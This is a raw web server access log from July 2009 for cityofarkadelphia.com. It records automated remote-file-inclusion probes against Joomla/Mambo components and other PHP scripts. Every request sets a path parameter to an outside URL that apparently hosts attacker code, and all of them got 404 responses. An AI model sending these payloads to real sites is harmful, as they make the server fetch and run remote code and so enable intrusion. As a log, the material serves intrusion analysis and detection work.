124.0.145.1 - - [01/Jul/2009:06:19:27 -0700] "GET /logs/index.php?body=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:19:27 -0700] "GET /logs/access.log%20%20/index.php?body=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:06:19:38 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:06:19:38 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:06:19:38 -0700] "GET /logs/access_080531.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:19:45 -0700] "GET /logs/access_080531.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:19:50 -0700] "GET /logs/access_080601.log%20%20/index.php?body=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.198.4.181 - - [01/Jul/2009:06:20:15 -0700] "GET /logs/access_081001.log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "cityofarkadelphia.com"
213.198.4.181 - - [01/Jul/2009:06:20:16 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "cityofarkadelphia.com"
213.198.4.181 - - [01/Jul/2009:06:20:16 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:06:20:17 -0700] "GET /bbs/outlogin.php?_zb_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:06:20:17 -0700] "GET /logs/access.log//bbs/outlogin.php?_zb_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:06:20:17 -0700] "GET /logs//bbs/outlogin.php?_zb_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.22.227.138 - - [01/Jul/2009:06:20:39 -0700] "GET /logs/access_081001.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:06:20:40 -0700] "GET /bbs/outlogin.php?_zb_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:06:20:40 -0700] "GET /logs//bbs/outlogin.php?_zb_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:06:20:40 -0700] "GET /logs/access.log//bbs/outlogin.php?_zb_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.22.227.138 - - [01/Jul/2009:06:20:40 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
217.22.227.138 - - [01/Jul/2009:06:20:41 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:06:20:44 -0700] "GET /logs//bbs/outlogin.php?_zb_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:06:20:44 -0700] "GET /logs/access.log%20%20//bbs/outlogin.php?_zb_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:06:20:45 -0700] "GET /bbs/outlogin.php?_zb_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [01/Jul/2009:06:21:12 -0700] "GET /logs/access_080531.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.198.4.181 - - [01/Jul/2009:06:21:29 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:06:22:43 -0700] "GET /logs/access.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:06:22:43 -0700] "GET /logs/access_080330.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.188.112.35 - - [01/Jul/2009:06:24:23 -0700] "GET /logs/access.log/index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.188.112.35 - - [01/Jul/2009:06:24:23 -0700] "GET /logs/index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.188.112.35 - - [01/Jul/2009:06:24:23 -0700] "GET /index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
65.254.39.210 - - [01/Jul/2009:06:25:15 -0700] "GET /logs/access_080330.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
65.254.39.210 - - [01/Jul/2009:06:27:36 -0700] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
65.254.39.210 - - [01/Jul/2009:06:27:36 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
65.254.39.210 - - [01/Jul/2009:06:27:36 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:27:40 -0700] "GET /logs/access.log/index.php?body=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:27:53 -0700] "GET /logs/access_080531.log/index.php?body=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.22.227.138 - - [01/Jul/2009:06:27:54 -0700] "GET /logs/access_080601.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:06:28:08 -0700] "GET /index1.php?=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:06:28:08 -0700] "GET /logs/access.log%20%20/index1.php?=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:06:28:08 -0700] "GET /logs/index1.php?=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:06:28:59 -0700] "GET /index.php?body=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:06:28:59 -0700] "GET /logs/index.php?body=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:06:28:59 -0700] "GET /logs/access.log%20%20/index.php?body=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:06:29:26 -0700] "GET /logs/access_080601.log%20%20/index.php?body=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:29:26 -0700] "GET /index1.php?=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:29:26 -0700] "GET /logs/index1.php?=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:29:31 -0700] "GET /logs/access.log%20%20/index1.php?=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:29:57 -0700] "GET /logs/access_080531.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [01/Jul/2009:06:30:16 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [01/Jul/2009:06:30:16 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [01/Jul/2009:06:30:16 -0700] "GET /logs/access.log//convert/mvcw.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:06:31:23 -0700] "GET /logs/access.log/index1.php?=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.193.229.212 - - [01/Jul/2009:06:32:35 -0700] "GET /logs/access_080601.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
213.193.229.212 - - [01/Jul/2009:06:32:35 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
213.193.229.212 - - [01/Jul/2009:06:32:35 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:06:33:56 -0700] "GET /logs/access_080531.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:06:33:56 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:06:33:56 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.149.74.81 - - [01/Jul/2009:06:34:28 -0700] "GET /logs/access_080601.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
195.149.74.81 - - [01/Jul/2009:06:34:28 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
195.149.74.81 - - [01/Jul/2009:06:34:28 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:06:36:15 -0700] "GET /logs/access.log/index.php?body=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:06:36:33 -0700] "GET /logs/access_080531.log/index.php?body=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:38:24 -0700] "GET /logs/access.log/index1.php?=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:06:41:16 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:06:41:16 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:06:41:17 -0700] "GET /logs/access_080531.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:06:41:48 -0700] "GET /bbs/outlogin.php?_zb_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.193.225.191 - - [01/Jul/2009:06:41:49 -0700] "GET /logs/access_080601.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
62.193.225.191 - - [01/Jul/2009:06:41:49 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
62.193.225.191 - - [01/Jul/2009:06:41:49 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:06:41:55 -0700] "GET /logs/access.log%20%20//bbs/outlogin.php?_zb_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
91.192.20.164 - - [01/Jul/2009:06:44:40 -0700] "GET /logs/access_080330.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.149.74.81 - - [01/Jul/2009:06:45:58 -0700] "GET /logs/access_081001.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
213.198.4.181 - - [01/Jul/2009:06:47:50 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "cityofarkadelphia.com"
213.198.4.181 - - [01/Jul/2009:06:47:51 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "cityofarkadelphia.com"
213.198.4.181 - - [01/Jul/2009:06:47:51 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "cityofarkadelphia.com"
213.198.4.181 - - [01/Jul/2009:06:48:59 -0700] "GET /logs/access_081001.log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "cityofarkadelphia.com"
67.228.191.194 - - [01/Jul/2009:06:51:36 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.228.191.194 - - [01/Jul/2009:06:51:36 -0700] "GET /logs/access_080601.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.228.191.194 - - [01/Jul/2009:06:51:36 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.228.191.194 - - [01/Jul/2009:06:53:53 -0700] "GET /logs/access_080330.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:54:30 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:54:30 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:54:30 -0700] "GET /logs/access_080601.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
91.192.20.164 - - [01/Jul/2009:06:56:29 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
91.192.20.164 - - [01/Jul/2009:06:56:29 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
91.192.20.164 - - [01/Jul/2009:06:56:29 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:06:57:47 -0700] "GET /logs/access_080330.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.149.74.81 - - [01/Jul/2009:06:58:07 -0700] "GET /logs/access_080601.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
195.149.74.81 - - [01/Jul/2009:06:58:07 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
195.149.74.81 - - [01/Jul/2009:06:58:07 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:06:59:23 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:06:59:23 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:06:59:23 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:06:59:23 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:06:59:24 -0700] "GET /logs/access_080531.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:06:59:24 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:06:59:58 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:06:59:58 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:06:59:58 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:07:00:14 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:07:00:14 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:07:00:14 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:07:00:23 -0700] "GET /logs/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:07:00:23 -0700] "GET /media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:07:00:23 -0700] "GET /logs/access_080531.log%20%20/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:07:00:23 -0700] "GET /logs/access_081001.log%20%20/media.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:07:01:18 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:07:01:19 -0700] "GET /logs/access_080601.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:07:01:19 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:07:01:21 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:07:01:21 -0700] "GET /logs/access_080531.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
